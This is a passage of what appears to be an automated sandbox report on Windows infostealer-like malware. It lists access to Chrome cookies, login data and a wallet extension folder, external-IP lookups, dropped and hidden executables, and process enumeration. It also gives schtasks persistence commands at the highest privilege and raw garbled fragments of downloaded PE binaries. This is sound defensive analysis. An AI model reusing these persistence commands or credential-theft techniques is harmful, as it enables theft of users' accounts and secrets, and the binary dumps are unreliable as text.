file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies

Foreign language identified in PE resource (4 events)

name

RT_ICON

language

LANG_NEUTRAL

filetype

data

sublanguage

SUBLANG_ARABIC_OMAN

offset

0x0002f550

size

0x000002e8

name

RT_ICON

language

LANG_NEUTRAL

filetype

data

sublanguage

SUBLANG_ARABIC_OMAN

offset

0x0002f550

size

0x000002e8

name

RT_GROUP_ICON

language

LANG_NEUTRAL

filetype

data

sublanguage

SUBLANG_ARABIC_OMAN

offset

0x0002f838

size

0x00000022

name

RT_VERSION

language

LANG_NEUTRAL

filetype

data

sublanguage

SUBLANG_ARABIC_OMAN

offset

0x0002f160

size

0x000002c4

Looks up the external IP address (2 events)

domain	ipinfo.io
domain	ip-api.com

Creates executable files on the filesystem (16 events)

file	C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe
file	C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
file	C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
file	C:\Users\test22\Documents\T9aZunTSaNJLBVfIkgF5mtQo.dll
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
file	C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
file	C:\Users\test22\Documents\Zz_8WJnWJcYwE8DTXxWfai7o.exe
file	C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
file	C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\DYbALA.exe
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\idp.dll
file	C:\Users\test22\Pictures\Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe
file	C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
file	C:\Users\test22\Pictures\Adobe Films\Nrsy5LhyZqW1S2cTgMnNCWa9.exe
file	C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (9 events)

file	C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
file	C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe
file	C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
file	C:\Users\test22\Documents\Zz_8WJnWJcYwE8DTXxWfai7o.exe
file	C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
file	C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
file	C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
file	C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
file	C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\is-TS3P8.tmp\82YG_xkSvDww7zcrD21MLhC8.tmp
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\DYbALA.exe

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Nov. 4, 2021, 2:43 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\egqRAdMP6vVHIbhfUato690f.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:43 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:43 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe	1	1
ShellExecuteExW Nov. 4, 2021, 2:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (43 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: mobsync.exe process_identifier: 1172	1	1
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: pw.exe process_identifier: 2080	1	1
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: taskhost.exe process_identifier: 2108	1	1
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: cmd.exe process_identifier: 2240	1	1
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: conhost.exe process_identifier: 2248	1	1
Process32NextW Nov. 4, 2021, 2:43 p.m.	snapshot_handle: 0x0000051c process_name: ww_testLL_0211_single.exe process_identifier: 2316	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: egqRAdMP6vVHIbhfUato690f.exe process_identifier: 2488	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: 01NWJ3EqrrXXQcofclOmpgme.exe process_identifier: 2592	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 2652	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2660	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 2684	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 2716	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 2748	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: schtasks.exe process_identifier: 2836	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: inject-x86.exe process_identifier: 2860	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: schtasks.exe process_identifier: 2872	1	1
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2896	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: 301tY1t7qg8_zDCV75DGJBHH.exe process_identifier: 3044	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2116	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 2220	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: 4dB197_1l7OerQHV9HHywWV_.exe process_identifier: 2432	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: is32bit.exe process_identifier: 2412	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: xETOXMkcQToHPFfFUFdC0rZ7.exe process_identifier: 2384	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2604	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2392	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 2588	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2968	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 2904	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 3060	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 500	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 1036	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 268	1	1
Process32NextW Nov. 4, 2021, 2:37 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 1652	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: mscorsvw.exe process_identifier: 2576	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: mscorsvw.exe process_identifier: 2612	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: sppsvc.exe process_identifier: 2164	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 2644	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 2704	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: cmd.exe process_identifier: 1084	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: pw.exe process_identifier: 492	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: 82YG_xkSvDww7zcrD21MLhC8.exe process_identifier: 2840	1	1
Process32NextW Nov. 4, 2021, 2:38 p.m.	snapshot_handle: 0x0000000000000028 process_name: 82YG_xkSvDww7zcrD21MLhC8.tmp process_identifier: 536	1	1
Process32NextW Nov. 4, 2021, 2:45 p.m.	snapshot_handle: 0x0000000000000028 process_name: inject-x64.exe process_identifier: 1696	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 4, 2021, 2:44 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes ww_testll_0211_single.exe, ehb3tx09sp7pc0g9ewmgexxa.exe, zz_8wjnwjcywe8dtxxwfai7o.exe, 82yg_xksvdww7zcrd21mlhc8.tmp (12 events)

Time & API	Arguments	Status	Return
InternetReadFile Nov. 4, 2021, 2:43 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $I4! Uîr Uîr Uîr>êsUîr>ísUîr>ësUîr:êsUîr:ísUîr:ës$Uîr>ïsUîr UïroUîrË:çsUîrË:rUîrË:ìsUîrRich UîrPEd\Ì<að"z\|7@P`TÔ(0è´@Ðµ8¶0¨.text¥yz `.rdataTMN~@@.dataàÌ@À.pdata´Ø@@_RDATA î@@.rsrcè0ð@@.reloc@ò@BH 9yéÌ$ÌÌÌÌHAíÃÌÌÌÌÌÌÌÌHT$LD$LL$ SVWHì0HúHt$`HÙèÊÿÿÿE3ÉHt$ LÇHÓHè<HÄ0_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌ@SHì HÙHÂH õWÀHSHHHèc1HÃHÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQH%HÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHì HHùHÚHÁè1öÃt ºHÏèì#H\$0HÇHÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQHHÁéY1ÌÌÌÌÌÌÌÌÌÌÌÌÌH±HÇAHAH¾HHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìHHL$ èÂÿÿÿH³ÂHL$ è!3Ì@SHì HÙHÂH ÕWÀHSHHHèC0HXHHÃHÄ [ÃÌÌÌÌ@SHì HÙHÂH WÀHSHHHè0HHHÃHÄ [ÃÌÌÌÌH\$Ht$WHìpHçÍH3ÄH$`3öÿ<~ø3ÒNÿï}HØHD$ HøÿtF3ÒA¸0HL$0è·4ÇD$00HT$0HËÿ}Àt9\|$8tHT$0HËÿÁ}ëæt$PHûÿt HËÿ´}ÆH$`H3ÌèL$pI[IsIã_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHìHÍH3ÄH$HÙ3ÀHHAHA3ÒHÿ}HøHD$ Høÿ3ÒA¸0HL$Pèâ3ÇD$P0HT$PHÏÿ¬\|Àt_LD$XHT$\|HL$(èÜHÐHKH;Ktè*HC(ëLÂHÑHËè¥HL$(èKHT$PHÏÿ¥\|Àu©Hÿÿt HÏÿ\|HÃH$H3ÌègH$¨HÄ_ÃÌÌÌÌÌÌ@SHì HQHÙHú request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:43 p.m.	buffer: rSÑ<¡ö?ÀÐ:Gö?hhö?g6qö?ù"Qjìaö?£J;ORö?d!YÈBö?ÞÀ¸V3ö?@bwú#ö?®1h³ö?X`ö?ü-)4döõ?çÐ¸[çõ?¥âìÃgØõ?W+Éõ?úGÆ¼ºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Òõ?`XVõ?:kP<íqõ?âR\|ºcõ?UUUUUUõ?þ»æ%Gõ?ëôH 9õ?K¨Vÿõ?øâêõ?ÅÄá"õ?PPõ?LÝbóô?9/§àåô?L,Ü¾CØô?n¯%¸Êô?á¦Ý>½ô?[¿R Ö¯ô?Jv¢ô?gÐ²ã9ô?H"ô?{®Gázô?f`Y4Îmô?ÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?Õ%f-ô?QY^&µ ô?ô?feÑô?û°?ûó?¯¥Bîó?©ä¼,âó?ÆuªÙÕó?ç«{¤Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,ó?fÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`ÄÈó?h/¡½öò?KÑþ¡Nëò?KÀ%àò? P- Õò? ,MûÉò?7Zù¾ò?@+´ò?Áó©ò?ä)Aò?¥¸[rò?°°ò?MÎ¡8ú}ò?5'¸Psò?'Ö\|³hò?ñp"^ò?²w~Sò?$I$Iò?[`·>ò?ß¼xV4ò? "*ò?xû!·ò?æUHyò?ÙÀgGò? ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg\|±ñ?{a¹§ñ?àñ?¢Sñ?Û+°ñ?ñ?Öwñ?ysBnñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í _Hñ?$G4?ñ?È5È5ñ?¬Àí,ñ?30]çX#ñ?&H§0ñ?ñ?¾ûñ?ðþðþð?¢%³úíõð?ækõìð?`Uäð?F¨ Ûð?:5VDÒð?;Ú¼OqÉð?qA§Àð?È%ìæ·ð?µì.r/¯ð?§h ¦ð?`¯¦Ûð?T 9?ð?âeu³«ð?B!ð?âê¸){ð?Æ÷G &sð?ûyµjð?ü©ñÒMbð?ur îYð?4×÷Qð?ÅdÌIIð?AAð?üG·Æ8ð?^µ0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞévMÞévMÞévMÊrLÕévMÊuLØévMÊsLGévMÕrLÐévMÕuL×évMÕsLýévMÊwLÝévMÞéwM¼évMLßévMMßévMtLßévMRichÞévMPEd Ì<að" ¶øTZ`¬z(àà°ÜðX8ÐX0Ð.textÅµ¶ ` request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:43 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¿´ºûiÚéûiÚéûiÚéïÙèñiÚéïßèaiÚéðÞèêiÚéðÙèìiÚéðßèÑiÚéïÞèîiÚéïÛèòiÚéûiÛéiÚé=ÓèþiÚé=%éúiÚé=ØèúiÚéRichûiÚéPELÚeaà,ðe¤@@P@°ãdè ¸%¶8À¶@@È.textß+, `.rdata ®@°0@@.dataìðà@À.rsrcèì@@.reloc¸% &î@BUìhØE¹àFèþhÀ;Eè´Ä]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌSÜìäðÄUkl$ìì¡ðE3ÅEü3ÀEß3ÉMÞ3ÒUÝEßEØMÞMÔUÝUÐÇE¸EÇE¼äÀñE¸E M¼M¤ÇE°x>XÇE´ÑHU°U¨E´E¬M MÈÇEà7k®ÇEääÀñÇEèx>XÇEìÑH3ÒUÜEÜEÌ(Eà)EMÈ)E(EfïE)pÿÿÿ(pÿÿÿUÈEÈEÄMÄQ¹øFèõhÐ;Eè«ÄMü3Íè&å]ã[ÃÌÌÌÌÌÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèÄEüå]ÂÌÌÌÌUìQMüEüÇ4BEMüÁQèÀÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüEüxtMüQUøëÇEø¬EEøå]ÃÌÌÌÌÌUìQMüEüÇ4BEMüÁQè`ÄUâtjEüPèÓÄEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÇ@ÀEMüÇ@BEUüÇ¼BEEüå]ÃUììMôè²ÿÿÿh<âEEôPè_¡å]ÃUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèIÄUüÇ@BEEüÇ¼BEEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèùÄUüÇ@BEEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUììEÁ#U EMôºkÂÿMôUøÇEðE+MøMü}ür}ü#wë èÅ3Òu÷3ÀuåMUøå]ÃÌÌÌÌÌÌÌÌÌÌÌUìjÿhxEd¡Pìx¡ðE3ÅEðPEôd£ÇEMØè)ÇEüÇEÐÇEÌEEMéM}`UEÇM request_handle: 0x00cc0010	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $bT¨&5ëû&5ëû&5ëû2^èú,5ëû2^îú´5ëû2^ïú45ëû-Zïú75ëû-Zèú05ëû-Zîú 5ëû2^êú%5ëû&5êû{5ëûàZâú%5ëûàZû'5ëû&5\|û'5ëûàZéú'5ëûRich&5ëûPELe>maà^ú0p@@ÁØÓ(¸]`0Ã°Ã@p,.textò\^ `.rdatarjplb@@.dataTà Î@À.rsrc¸]^Ø@@.reloc0`6@Bh¨ÁA¹ èAèa=h lAè_YÃÌÌÌÌÌUìäðì Ç$Tµ=;$ÇD$YA¡QÇD$a[ÖÇD$j8à($ÇD$e=;ÇD$YA¡ÇD$a[ÖÇD$j8àfïL$)$ÇõAÇõAÆüôAAÀuù+Ê$QP¹üôAèÑ=hplAè¿Äå]Ãh¨ÁA¹¸èAè¡<h°lAèYÃÌÌÌÌÌ¸õAÃÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇôrAfÖEÀPèPÄÆ^]ÂÌÌÌI¸<ÁAÉEÁÃÌÌUìVñFÇôrAPèÄöEtjVè7ÄÆ^]ÂAÇôrAPèWYÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAPÁAÇìvAÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh¬ÓAEôPègÌÌÌÌUìVñWÀFPÇôrAfÖEÀPèÄÇìvAÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇôrAfÖEÀPè@ÄÇsAÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUììEEðESEôMðEôÈVWu)EðMôÀEðÑMôEEðEEôMðEôÈtØEðºFMôÑ¤ÿÿEð¿NÚÉÑÿMôEðMôlÿÿÿEðÑÿMôMðÁ]ô÷â]üEðòÁ¹F÷çøUôÃ÷áÈÚEüºNÚÉ÷âÎEüÓùMôÑ}è3ÀÙMüÀË_Ð¬Ñ ^MðÁê UôEðMô'¶ÝEðÑÿMôEðUô[å]ÂÌÌÌÌUìì EMðEàñMäÇEðÇEôÇEø³P ÇEüÇEèäÂ£ÇEìUøVuüEðÐMôñÂUðÖuôEèMìUàuä+ÐUàñuäuàUäMðEôPQRVèVREàUäEàUä^å]ÂÌÌÌSÜìäðÄUkl$ììÈ¡àA request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: [£3ª£Q'£HwK££®££4£££££££ ¨£R¬Ç£RRO£RRO£R°£££££Á¡¿¿1¿ñ¿ð¿ô¿ö¿÷¿÷¾¾¾G¾¾? q (@@ (B00 ¨% ¨ hMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELEçºYà" 0¶vÕ à `$ÕOàðìÓ H.text¤µ ¶ `.rsrcðà¸@@.reloc¾@BXÕHÉ<<Ð°2~(7 6~(8 F~ (7 t"6~ (8 F~(7 t"6~(8 F~(7 ¥J~(8 6~(9 6~(: F~(7 ¥J~(; 0ft%(< u®(= , (< ,(< u®þþ++o(> (< s? %~o@ oA v(B rp(C u}0(D {-*{oE request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $I4! Uîr Uîr Uîr>êsUîr>ísUîr>ësUîr:êsUîr:ísUîr:ës$Uîr>ïsUîr UïroUîrË:çsUîrË:rUîrË:ìsUîrRich UîrPEd\Ì<að"z\|7@P`TÔ(0è´@Ðµ8¶0¨.text¥yz `.rdataTMN~@@.dataàÌ@À.pdata´Ø@@_RDATA î@@.rsrcè0ð@@.reloc@ò@BH 9yéÌ$ÌÌÌÌHAíÃÌÌÌÌÌÌÌÌHT$LD$LL$ SVWHì0HúHt$`HÙèÊÿÿÿE3ÉHt$ LÇHÓHè<HÄ0_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌ@SHì HÙHÂH õWÀHSHHHèc1HÃHÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQH%HÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHì HHùHÚHÁè1öÃt ºHÏèì#H\$0HÇHÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQHHÁéY1ÌÌÌÌÌÌÌÌÌÌÌÌÌH±HÇAHAH¾HHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìHHL$ èÂÿÿÿH³ÂHL$ è!3Ì@SHì HÙHÂH ÕWÀHSHHHèC0HXHHÃHÄ [ÃÌÌÌÌ@SHì HÙHÂH WÀHSHHHè0HHHÃHÄ [ÃÌÌÌÌH\$Ht$WHìpHçÍH3ÄH$`3öÿ<~ø3ÒNÿï}HØHD$ HøÿtF3ÒA¸0HL$0è·4ÇD$00HT$0HËÿ}Àt9\|$8tHT$0HËÿÁ}ëæt$PHûÿt HËÿ´}ÆH$`H3ÌèL$pI[IsIã_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHìHÍH3ÄH$HÙ3ÀHHAHA3ÒHÿ}HøHD$ Høÿ3ÒA¸0HL$Pèâ3ÇD$P0HT$PHÏÿ¬\|Àt_LD$XHT$\|HL$(èÜHÐHKH;Ktè*HC(ëLÂHÑHËè¥HL$(èKHT$PHÏÿ¥\|Àu©Hÿÿt HÏÿ\|HÃH$H3ÌègH$¨HÄ_ÃÌÌÌÌÌÌ@SHì HQHÙHú request_handle: 